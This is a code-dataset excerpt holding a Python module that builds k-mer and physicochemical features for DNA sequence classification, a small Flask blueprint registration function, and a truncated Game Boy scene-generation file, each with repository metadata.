MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
import itertools
import numpy as np
import pandas as pd
def F_score(v, y_label):
    """Fisher score (F-score) of feature vector ``v`` for binary labels.

    :param v: 1-D numpy array of feature values, one per sample.
    :param y_label: 1-D array of labels; values > 0 mark the positive class.
    :returns: between-class separation over within-class scatter.  Each
        class needs at least two samples (the ``len - 1`` denominators).
    """
    v_pos = v[y_label > 0]
    v_neg = v[y_label <= 0]
    v_ave = np.mean(v)
    v_pos_ave = np.mean(v_pos)
    v_neg_ave = np.mean(v_neg)
    # Within-class sums of squared deviations, vectorized.
    # BUG FIX: the original negative-class loop accumulated v_neg[i] using
    # the stale index left over from the positive-class loop instead of
    # v_neg[j], so the negative scatter was computed from a single element.
    x_0 = np.sum((v_pos - v_pos_ave) ** 2)
    x_1 = np.sum((v_neg - v_neg_ave) ** 2)
    f_score = ((v_pos_ave - v_ave) ** 2 + (v_neg_ave - v_ave) ** 2) / (
        (1 / (len(v_pos) - 1)) * x_0 + (1 / (len(v_neg) - 1)) * x_1)
    return f_score
def make_kmer_list(k, alphabet):
    """Return every k-length word over ``alphabet`` in product order.

    :param k: word length; a non-negative integer.
    :param alphabet: iterable of single characters, e.g. 'ACGT'.
    :raises TypeError: if ``k`` is not an integer or ``alphabet`` is not
        iterable (re-raised from itertools.product).
    :raises ValueError: if ``k`` is negative.
    """
    try:
        return ["".join(e) for e in itertools.product(alphabet, repeat=k)]
    except TypeError:
        # Fixed message text ('inter' -> 'integer'); bare `raise` keeps the
        # original exception and traceback instead of a blank TypeError.
        print("TypeError: k must be an integer and larger than 0, alphabet must be a string.")
        raise
    except ValueError:
        # Fixed message: this branch previously printed a 'TypeError:' prefix.
        print("ValueError: k must be an integer and larger than 0")
        raise
def kmer(data_seq, k):
    """k-mer composition features for each sequence in ``data_seq``.

    :param data_seq: pandas DataFrame whose first column holds sequence
        strings over the alphabet ACGT.
    :param k: k-mer length.  BUG FIX: the original ignored this parameter
        and always built 3-mers (``make_kmer_list(3, ...)``); honouring
        ``k`` is backward-compatible since the in-file caller passes 3.
    :returns: (n_samples, 4**k) numpy array of normalized k-mer counts.
    """
    RNA_code = 'ACGT'
    code_values = make_kmer_list(k, RNA_code)
    count = np.zeros((len(data_seq), len(code_values)))
    for i, line_value in enumerate(data_seq.values):  # for every sample
        for j, code_value in enumerate(line_value[0]):  # for every position
            if j <= len(line_value[0]) - k + 1:
                for p, c_value in enumerate(code_values):
                    if c_value == line_value[0][j:j + k]:
                        count[i][p] += 1
    # NOTE(review): denominator kept from the original (number of k-mer
    # types minus k plus 1); presumably a sequence-length normalization was
    # intended -- verify before changing.
    count /= len(code_values) - k + 1
    return count
def MvPS3merNP(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
    """Multi-view position-specific k-mer nucleotide-propensity features.

    For each key in ``train_samples`` a (k-mer x position) matrix is built
    from that key's sequences: per-position k-mer frequency in the positive
    set minus the frequency in the negative set.  Every training and test
    sequence is then encoded by looking up, at each position, the value for
    the k-mer it carries there.

    :param all_positive_seq: mapping key -> list of positive sequences.
    :param all_negative_seq: mapping key -> list of negative sequences.
    :param train_samples: keys used to build the matrices and to encode
        the training sequences.
    :param test_sample: key whose sequences are encoded as the test set.
    :param interval: k-mer length.
    :returns: ``(X_train, X_test)`` numpy arrays, one stacked block of
        encodings per training key.
    """
    RNA_code = 'ACGT'
    all_final_seq_value_tra = []
    all_final_seq_value_tes = []
    for train_sample in train_samples:
        # calculate Z matrix
        positive_seq = all_positive_seq[train_sample]
        negative_seq = all_negative_seq[train_sample]
        # All sequences are assumed to share the length of the first
        # positive sequence -- TODO confirm with callers.
        len_seq = len(positive_seq[0])
        positive_df = pd.DataFrame(positive_seq)
        positive_x_train = positive_df.iloc[:, :]
        negative_df = pd.DataFrame(negative_seq)
        negative_x_train = negative_df.iloc[:, :]
        code_values = make_kmer_list(interval, RNA_code)
        code_len = len(code_values)
        positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        # Count occurrences of each k-mer p at each position j in the
        # positive set, then normalize to frequencies.
        for i, line_value in enumerate(positive_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            positive_seq_value[p][j] += 1
        positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
        # Same positional k-mer frequencies for the negative set.
        for i, line_value in enumerate(negative_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            negative_seq_value[p][j] += 1
        negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
        tes_final_value = []
        tra_final_value = []
        # training features
        for train_sample_x in train_samples:
            tra_positive_seq = all_positive_seq[train_sample_x]
            tra_negative_seq = all_negative_seq[train_sample_x]
            tra_positive_df = pd.DataFrame(tra_positive_seq)
            tra_negative_df = pd.DataFrame(tra_negative_seq)
            tra_positive_train = tra_positive_df.iloc[:, :]
            tra_negative_train = tra_negative_df.iloc[:, :]
            tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
            tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                                   range(len(tra_positive_negative_train))]
            # Encode each sequence: position j gets (pos freq - neg freq)
            # of the k-mer observed at j.
            for i, line_value in enumerate(tra_positive_negative_train.values):
                for j, code_value in enumerate(line_value[0]):
                    if j <= len(line_value[0]) - interval + 1:
                        for p, c_value in enumerate(code_values):
                            if c_value == line_value[0][j:j + interval]:
                                tra_final_seq_value[i][j] = positive_seq_value[p, j] - negative_seq_value[p, j]
            tra_final_value.append(tra_final_seq_value)
        # Test features: same encoding applied to the test key's sequences.
        tes_positive_seq = all_positive_seq[test_sample]
        tes_negative_seq = all_negative_seq[test_sample]
        tes_positive_df = pd.DataFrame(tes_positive_seq)
        tes_negative_df = pd.DataFrame(tes_negative_seq)
        tes_positive_train = tes_positive_df.iloc[:, :]
        tes_negative_train = tes_negative_df.iloc[:, :]
        tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
        tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                               range(len(tes_positive_negative_train))]
        for i, line_value in enumerate(tes_positive_negative_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            tes_final_seq_value[i][j] = positive_seq_value[p, j] - negative_seq_value[p, j]
        tes_final_value.append(tes_final_seq_value)
        all_final_seq_value_tra.append(np.concatenate(tra_final_value))
        all_final_seq_value_tes.append(np.concatenate(tes_final_value))
    X_train = np.array(all_final_seq_value_tra)
    X_test = np.array(all_final_seq_value_tes)
    return X_train, X_test
def MvPS3merNP_KL(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
    """Multi-view position-specific k-mer features with KL-style weights.

    Like ``MvPS3merNP`` but the per-(k-mer, position) weight matrix is
    ``Z = p * (log p - log q)`` (element-wise), where ``p``/``q`` are the
    positive/negative positional k-mer frequencies clipped below at 1e-09.

    :param all_positive_seq: mapping key -> list of positive sequences.
    :param all_negative_seq: mapping key -> list of negative sequences.
    :param train_samples: keys used to build Z and to encode training data.
    :param test_sample: key whose sequences are encoded as the test set.
    :param interval: k-mer length.
    :returns: ``(X_train, X_test)`` numpy arrays, one block per key.
    """
    RNA_code = 'ACGT'
    all_final_seq_value_tra = []
    all_final_seq_value_tes = []
    for train_sample in train_samples:
        # calculate Z matrix
        positive_seq = all_positive_seq[train_sample]
        negative_seq = all_negative_seq[train_sample]
        len_seq = len(positive_seq[0])
        positive_df = pd.DataFrame(positive_seq)
        positive_x_train = positive_df.iloc[:, :]
        negative_df = pd.DataFrame(negative_seq)
        negative_x_train = negative_df.iloc[:, :]
        code_values = make_kmer_list(interval, RNA_code)
        code_len = len(code_values)
        positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        # Positional k-mer counts -> frequencies for the positive set.
        for i, line_value in enumerate(positive_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            positive_seq_value[p][j] += 1
        positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
        # Positional k-mer counts -> frequencies for the negative set.
        for i, line_value in enumerate(negative_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            negative_seq_value[p][j] += 1
        negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
        # Clip zeros so the logarithms below stay finite.
        positive_seq_value[positive_seq_value <= 0] = 1e-09
        positive_seq_value_log = np.log(positive_seq_value)
        # positive_seq_value_log[np.isinf(positive_seq_value_log)] = -10
        negative_seq_value[negative_seq_value <= 0] = 1e-09
        negative_seq_value_log = np.log(negative_seq_value)
        # negative_seq_value_log[np.isinf(negative_seq_value_log)] = -10
        Z = np.multiply(positive_seq_value, (positive_seq_value_log - negative_seq_value_log))
        tes_final_value = []
        tra_final_value = []
        # training features
        for train_sample_x in train_samples:
            tra_positive_seq = all_positive_seq[train_sample_x]
            tra_negative_seq = all_negative_seq[train_sample_x]
            tra_positive_df = pd.DataFrame(tra_positive_seq)
            tra_negative_df = pd.DataFrame(tra_negative_seq)
            tra_positive_train = tra_positive_df.iloc[:, :]
            tra_negative_train = tra_negative_df.iloc[:, :]
            tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
            tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                                   range(len(tra_positive_negative_train))]
            # Encode each sequence: position j gets Z for its observed k-mer.
            for i, line_value in enumerate(tra_positive_negative_train.values):
                for j, code_value in enumerate(line_value[0]):
                    if j <= len(line_value[0]) - interval + 1:
                        for p, c_value in enumerate(code_values):
                            if c_value == line_value[0][j:j + interval]:
                                tra_final_seq_value[i][j] = Z[p, j]
            tra_final_value.append(tra_final_seq_value)
        # Test features: same encoding for the test key's sequences.
        tes_positive_seq = all_positive_seq[test_sample]
        tes_negative_seq = all_negative_seq[test_sample]
        tes_positive_df = pd.DataFrame(tes_positive_seq)
        tes_negative_df = pd.DataFrame(tes_negative_seq)
        tes_positive_train = tes_positive_df.iloc[:, :]
        tes_negative_train = tes_negative_df.iloc[:, :]
        tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
        tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                               range(len(tes_positive_negative_train))]
        for i, line_value in enumerate(tes_positive_negative_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            tes_final_seq_value[i][j] = Z[p, j]
        tes_final_value.append(tes_final_seq_value)
        all_final_seq_value_tra.append(np.concatenate(tra_final_value))
        all_final_seq_value_tes.append(np.concatenate(tes_final_value))
    X_train = np.array(all_final_seq_value_tra)
    X_test = np.array(all_final_seq_value_tes)
    return X_train, X_test
def MvPS3merNP_JS(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
    """Multi-view position-specific k-mer features with JS-style weights.

    Like ``MvPS3merNP`` but the per-(k-mer, position) weight matrix is the
    element-wise Jensen-Shannon form
    ``Z = 1/2 * p*(log p - log m) + 1/2 * q*(log q - log m)`` with
    ``m = (p + q) / 2``, where ``p``/``q`` are the positive/negative
    positional k-mer frequencies clipped below at 1e-09.

    :param all_positive_seq: mapping key -> list of positive sequences.
    :param all_negative_seq: mapping key -> list of negative sequences.
    :param train_samples: keys used to build Z and to encode training data.
    :param test_sample: key whose sequences are encoded as the test set.
    :param interval: k-mer length.
    :returns: ``(X_train, X_test)`` numpy arrays, one block per key.
    """
    RNA_code = 'ACGT'
    all_final_seq_value_tra = []
    all_final_seq_value_tes = []
    for train_sample in train_samples:
        # calculate Z matrix
        positive_seq = all_positive_seq[train_sample]
        negative_seq = all_negative_seq[train_sample]
        len_seq = len(positive_seq[0])
        positive_df = pd.DataFrame(positive_seq)
        positive_x_train = positive_df.iloc[:, :]
        negative_df = pd.DataFrame(negative_seq)
        negative_x_train = negative_df.iloc[:, :]
        code_values = make_kmer_list(interval, RNA_code)
        code_len = len(code_values)
        positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
        # Positional k-mer counts -> frequencies for the positive set.
        for i, line_value in enumerate(positive_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            positive_seq_value[p][j] += 1
        positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
        # Positional k-mer counts -> frequencies for the negative set.
        for i, line_value in enumerate(negative_x_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            negative_seq_value[p][j] += 1
        negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
        # Clip zeros so the logarithms below stay finite.
        positive_seq_value[positive_seq_value <= 0] = 1e-09
        positive_seq_value_log = np.log(positive_seq_value)
        # positive_seq_value_log[np.isinf(positive_seq_value_log)] = -10
        negative_seq_value[negative_seq_value <= 0] = 1e-09
        negative_seq_value_log = np.log(negative_seq_value)
        # negative_seq_value_log[np.isinf(negative_seq_value_log)] = -10
        seq_value_log = np.log((positive_seq_value + negative_seq_value) / 2)
        Z = 1 / 2 * np.multiply(positive_seq_value, (positive_seq_value_log - seq_value_log)) + 1 / 2 * np.multiply(
            negative_seq_value, (negative_seq_value_log - seq_value_log))
        tes_final_value = []
        tra_final_value = []
        # training features
        for train_sample_x in train_samples:
            tra_positive_seq = all_positive_seq[train_sample_x]
            tra_negative_seq = all_negative_seq[train_sample_x]
            tra_positive_df = pd.DataFrame(tra_positive_seq)
            tra_negative_df = pd.DataFrame(tra_negative_seq)
            tra_positive_train = tra_positive_df.iloc[:, :]
            tra_negative_train = tra_negative_df.iloc[:, :]
            tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
            tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                                   range(len(tra_positive_negative_train))]
            # Encode each sequence: position j gets Z for its observed k-mer.
            for i, line_value in enumerate(tra_positive_negative_train.values):
                for j, code_value in enumerate(line_value[0]):
                    if j <= len(line_value[0]) - interval + 1:
                        for p, c_value in enumerate(code_values):
                            if c_value == line_value[0][j:j + interval]:
                                tra_final_seq_value[i][j] = Z[p, j]
            tra_final_value.append(tra_final_seq_value)
        # Test features: same encoding for the test key's sequences.
        tes_positive_seq = all_positive_seq[test_sample]
        tes_negative_seq = all_negative_seq[test_sample]
        tes_positive_df = pd.DataFrame(tes_positive_seq)
        tes_negative_df = pd.DataFrame(tes_negative_seq)
        tes_positive_train = tes_positive_df.iloc[:, :]
        tes_negative_train = tes_negative_df.iloc[:, :]
        tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
        tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
                               range(len(tes_positive_negative_train))]
        for i, line_value in enumerate(tes_positive_negative_train.values):
            for j, code_value in enumerate(line_value[0]):
                if j <= len(line_value[0]) - interval + 1:
                    for p, c_value in enumerate(code_values):
                        if c_value == line_value[0][j:j + interval]:
                            tes_final_seq_value[i][j] = Z[p, j]
        tes_final_value.append(tes_final_seq_value)
        all_final_seq_value_tra.append(np.concatenate(tra_final_value))
        all_final_seq_value_tes.append(np.concatenate(tes_final_value))
    X_train = np.array(all_final_seq_value_tra)
    X_test = np.array(all_final_seq_value_tes)
    return X_train, X_test
def PRO12(all_positive_seq, all_negative_seq, train_sample):
    """Encode pos+neg sequences of one key as 12 dinucleotide property
    values per position.

    Each overlapping dinucleotide contributes its 12-value row from the
    property table ``Z``; positions whose 2-character window is not a
    dinucleotide over ACGT leave their 12 slots at zero.  Rows are the
    positive sequences followed by the negative sequences.
    """
    Z = {'AA': [0.85, 0.85, -0.22, -0.96, -0.73, -0.62, -0.09, 0.68, -1, 1, 0.36, 0.23],
         'AC': [-1, -1, -0.6, -0.45, -0.27, 0.37, -0.64, 0.37, 0.05, 0.56, -0.48, 0.50],
         'AG': [-0.56, -0.56, -1.00, 0.45, -0.27, -0.18, -0.36, 0.37, -0.12, -0.10, -0.39, 0.04],
         'AT': [-0.01, -0.01, 1.00, -1.00, -1.00, -0.48, -1.00, 1.00, -0.31, -0.90, -1.00, 1.00],
         'CA': [1.00, 1.00, 0.13, 1.00, -0.27, -0.65, -0.09, 0.16, 0.75, -0.14, 0.88, -0.77],
         'CC': [-0.87, -0.87, -0.25, 0.81, 1.00, 0.15, 1.00, -0.47, 1.00, -0.75, -0.15, -0.35],
         'CG': [-0.14, -0.14, -0.89, 0.80, 0.18, -0.10, 1.45, -1.00, 0.64, -0.45, 0.60, -1.00],
         'CT': [-0.56, -0.56, -1.00, -0.29, -0.27, -0.18, -0.36, 0.37, -0.12, -1.00, -0.39, 0.04],
         'GA': [0.87, 0.87, 0.43, 1.24, -0.27, -0.30, -0.36, 0.37, -0.02, 0.87, 0.65, 0.04],
         'GC': [0.32, 0.32, 0.24, 1.17, 0.18, 1.00, 1.00, -0.47, 0.44, -0.54, 0.01, 0.27],
         'GG': [-0.87, -0.87, -0.25, 0.63, 1.00, 0.15, 1.00, -0.47, 1.00, -0.14, -0.15, -0.35],
         'GT': [-1.00, -1.00, -0.60, -0.29, -0.27, 0.37, -0.64, 0.37, 0.05, -0.90, -0.48, 0.50],
         'TA': [0.32, 0.32, -0.84, 2.37, -1.00, -1.00, -0.45, 1.00, 0.29, -0.87, 1.00, -0.31],
         'TC': [0.87, 0.87, 0.43, 0.24, -0.27, -0.30, -0.36, 0.37, -0.02, -0.45, 0.65, 0.04],
         'TG': [1.00, 1.00, 0.13, 2.02, -0.27, -0.65, -0.09, 0.16, 0.75, 0.56, 0.88, -0.77],
         'TT': [0.85, 0.85, -0.22, -1.00, -0.73, -0.62, -0.09, 0.68, -1.00, -0.77, 0.36, 0.23]}
    pos_frame = pd.DataFrame(all_positive_seq[train_sample]).iloc[:, :]
    neg_frame = pd.DataFrame(all_negative_seq[train_sample]).iloc[:, :]
    combined = pd.concat([pos_frame, neg_frame], axis=0)
    # Sequence length taken from the first positive sequence.
    seq_len = len(all_positive_seq[train_sample][0])
    encoded = [[0 for _ in range(12 * (seq_len - 1))] for _ in range(len(combined))]
    for row, record in enumerate(combined.values):
        sequence = record[0]
        # Direct table lookup replaces the original scan over all 16
        # dinucleotides; the key set is identical, so behavior matches.
        for pos in range(len(sequence) - 1):
            pair = sequence[pos:pos + 2]
            if pair in Z:
                encoded[row][(12 * pos):(12 * (pos + 1))] = np.array(Z[pair])
    return np.array(encoded)
def ratio(all_positive_seq, all_negative_seq, train_sample):
    """GC content, GC skew, AT skew and AT/GC ratio for each sequence.

    :param all_positive_seq: mapping key -> list of positive sequences.
    :param all_negative_seq: mapping key -> list of negative sequences.
    :param train_sample: key selecting the sequences to encode; rows are
        the positive sequences followed by the negative sequences.
    :returns: (n_samples, 4) numpy array of
        [GC content, GC skew, AT skew, AT/GC ratio].
    :raises ZeroDivisionError: for sequences with no A/T or no C/G
        (unchanged from the original).
    """
    positive_seq = all_positive_seq[train_sample]
    negative_seq = all_negative_seq[train_sample]
    positive_df = pd.DataFrame(positive_seq)
    positive_x_train = positive_df.iloc[:, :]
    negative_df = pd.DataFrame(negative_seq)
    negative_x_train = negative_df.iloc[:, :]
    positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
    tra_final_seq_value = np.zeros((len(positive_negative_train), 4))
    for i, line_value in enumerate(positive_negative_train.values):  # for every sample
        seq = line_value[0]
        A_count = seq.count('A')
        C_count = seq.count('C')
        G_count = seq.count('G')
        T_count = seq.count('T')
        # BUG FIX: GC content must be normalized by the sequence length;
        # the original divided by the number of samples in the batch.
        tra_final_seq_value[i][0] = (C_count + G_count) / len(seq)
        tra_final_seq_value[i][1] = (C_count - G_count) / (C_count + G_count)
        tra_final_seq_value[i][2] = (A_count - T_count) / (A_count + T_count)
        tra_final_seq_value[i][3] = (A_count + T_count) / (C_count + G_count)
    return tra_final_seq_value
def ChemicalProperty(all_positive_seq, all_negative_seq, train_sample):
    """Per-position chemical-property encoding of pos+neg sequences.

    Every position contributes four values: the three property bits of its
    nucleotide from ``X`` plus the cumulative density of that nucleotide in
    the prefix ending at the position.  Characters outside ACGT leave their
    four slots at zero.  Rows are the positive sequences followed by the
    negative sequences.
    """
    X = {'A': [1, 1, 1], 'C': [0, 1, 0], 'G': [1, 0, 0], 'T': [0, 0, 1]}
    pos_frame = pd.DataFrame(all_positive_seq[train_sample]).iloc[:, :]
    neg_frame = pd.DataFrame(all_negative_seq[train_sample]).iloc[:, :]
    combined = pd.concat([pos_frame, neg_frame], axis=0)
    # Sequence length taken from the first positive sequence.
    seq_len = len(all_positive_seq[train_sample][0])
    encoded = [[0 for _ in range(4 * seq_len)] for _ in range(len(combined))]
    for row, record in enumerate(combined.values):
        sequence = record[0]
        # Direct dict membership replaces the original scan over the 1-mer
        # list; the key sets are identical, so behavior matches.
        for pos, base in enumerate(sequence):
            if base in X:
                density = (sequence[:pos + 1].count(base)) / (pos + 1)
                encoded[row][(4 * pos):(4 * (pos + 1))] = X[base] + [density]
    return np.array(encoded)
def PseEiip(all_positive_seq, all_negative_seq, train_sample):
    """EIIP-weighted 3-mer composition (PseEIIP) features.

    Each sequence's normalized 3-mer counts (from ``kmer``) are multiplied
    element-wise by the EIIP value of each 3-mer, which is the sum of its
    nucleotides' electron-ion interaction potentials.

    :param all_positive_seq: mapping key -> list of positive sequences.
    :param all_negative_seq: mapping key -> list of negative sequences.
    :param train_sample: key selecting the sequences; rows are positives
        followed by negatives.
    :returns: (n_samples, 64) numpy array.
    """
    RNA_code = 'ACGT'
    # Electron-ion interaction potentials per nucleotide.
    ea = 0.126
    et = 0.1335
    eg = 0.0806
    ec = 0.134
    # BUG FIX: the original mapped 'C' -> et and 'T' -> ec, swapping the C
    # and T potentials; the published EIIP values are A=0.1260, C=0.1340,
    # G=0.0806, T=0.1335, matching the variable names used above.
    eACGT = {'A': ea, 'C': ec, 'G': eg, 'T': et}
    code_values = make_kmer_list(3, RNA_code)
    emer = np.zeros((1, len(code_values)))
    positive_seq = all_positive_seq[train_sample]
    negative_seq = all_negative_seq[train_sample]
    positive_df = pd.DataFrame(positive_seq)
    positive_x_train = positive_df.iloc[:, :]
    negative_df = pd.DataFrame(negative_seq)
    negative_x_train = negative_df.iloc[:, :]
    positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
    # EIIP value of a 3-mer is the sum of its three nucleotide potentials.
    for i, code_value in enumerate(code_values):
        emer[0][i] = eACGT[code_value[0]] + eACGT[code_value[1]] + eACGT[code_value[2]]
    EMER = np.ones((len(positive_negative_train), 1)).dot(emer)
    F = kmer(positive_negative_train, 3)
    A = F * EMER
    return A
| 46.202454
| 117
| 0.605232
| 3,385
| 22,593
| 3.707238
| 0.058198
| 0.07395
| 0.053869
| 0.031875
| 0.894414
| 0.86469
| 0.850665
| 0.844689
| 0.83425
| 0.822695
| 0
| 0.049779
| 0.278006
| 22,593
| 488
| 118
| 46.297131
| 0.719532
| 0.025096
| 0
| 0.728767
| 0
| 0
| 0.009015
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.008219
| 0
| 0.063014
| 0.005479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc36c05e9d3f1f4b8edbae327901dfb07ee206e6
| 182
|
py
|
Python
|
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | null | null | null |
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | null | null | null |
ndopapp/yourdetails/__init__.py
|
nhsconnect/ndop-nojs
|
ad049db27650e850742a3bd466f96d36a3420589
|
[
"MIT"
] | 2
|
2019-04-11T14:21:33.000Z
|
2021-04-11T07:29:43.000Z
|
def create_module(app, **kwargs):
    """Register the yourdetails blueprint on *app* under the configured prefix."""
    from .controllers import yourdetails_blueprint
    prefix = app.config.get("URL_PREFIX")
    app.register_blueprint(yourdetails_blueprint, url_prefix=prefix)
| 30.333333
| 90
| 0.774725
| 22
| 182
| 6.136364
| 0.681818
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126374
| 182
| 5
| 91
| 36.4
| 0.849057
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
cc59e71cba549332904e8e96850e46c46a2a0299
| 25,419
|
py
|
Python
|
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | 3
|
2021-08-07T03:38:02.000Z
|
2021-09-17T14:33:27.000Z
|
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
rom_generator/scenes/imported/TempleCorridor.py
|
ikarth/game-boy-rom-generator
|
29576a4bbe87a0032f80967d4b740059a65ea5c9
|
[
"MIT"
] | null | null | null |
# Generated Scene Functions
# TempleCorridor.py
from rom_generator import generator
from rom_generator import script_functions as script
test_generation_destination_path = "../gbprojects/generated_export_test_TempleCorridor/"
def scene_generation():
    """
    Build the "Temple Corridor" scene library.

    Returns a ``(catalog, sprite_sheet_data)`` pair:
      * ``catalog`` -- zero-argument function returning the list of
        scene-generator functions exported by this library.
      * ``sprite_sheet_data`` -- the sprite sheets those scenes rely on.
    """
    sprite_sheet_data = [
        generator.makeSpriteSheet('actor.png', name='actor', type='actor', frames=3),
        generator.makeSpriteSheet('actor_animated.png', name='actor_animated', type='actor_animated', frames=6),
        generator.makeSpriteSheet('static.png', name='static', type='static', frames=1)]

    def findSpriteByName(sprite_name):
        '''
        Return the first sprite sheet whose 'name' matches sprite_name,
        or None when there is no match.
        '''
        # next() with a default replaces the original bare-except/[0]
        # pattern; .get() also tolerates a sheet without a 'name' key.
        return next((s for s in sprite_sheet_data if s.get('name') == sprite_name), None)

    def getBySceneLabel(scene_label):
        '''
        This is mostly here so we can get the matching scene from the original
        template data. As used here it just grabs the first scene that was made
        from that template, so if the template is used more than once it won't
        behave as expected and you should generate a proper relationship instead.
        '''
        s_id = generator.getSceneIdByLabel(scene_label)
        if s_id is None:
            # Unresolved-reference marker; resolved later by
            # generator.translateReferences().
            return '<♔' + scene_label + '♔>'
        return s_id

    def _makeConnectionCreator():
        """
        Build a 'creator' callback for one SLOT_CONNECTION.

        Every connection in this library previously carried a byte-identical
        copy of this closure; they are now produced by this single factory.
        The callback makes a trigger covering source_location/source_size
        that switches to destination_scene_id, placing the player at
        destination_location facing destination_direction.
        """
        def addConnection(source_location, source_size, destination_scene_id, destination_location, destination_direction):
            trigger = generator.makeTrigger('trigger_connection', source_location[0], source_location[1], source_size[0], source_size[1])
            trigger['script'] = [
                script.switchScene(sceneId=destination_scene_id, x=destination_location[0], y=destination_location[1], direction=destination_direction, fadeSpeed='2'),
                script.end()
            ]
            return trigger
        return addConnection

    def _connection(scene_id, exit_location, exit_direction, entrance_location, entrance_size, tags):
        """Describe one symmetric connection slot for a generated scene."""
        return {'type': 'SLOT_CONNECTION',
                'creator': _makeConnectionCreator(),
                'args': {'exit_location': exit_location,
                         'exit_direction': exit_direction,
                         'entrance': scene_id,
                         'entrance_location': entrance_location,
                         'entrance_size': entrance_size},
                'tags': tags}

    def _scene_data(scn, bkg, connections):
        """Assemble the standard scene-data record shared by every scene here."""
        return {"scene": scn, "background": bkg, "sprites": [],
                "connections": connections, "references": [], "tags": ["Temple"]}

    # NOTE(review): the original scene functions also built unused
    # actor_name_table dicts and trigger_NN locals that were never added to
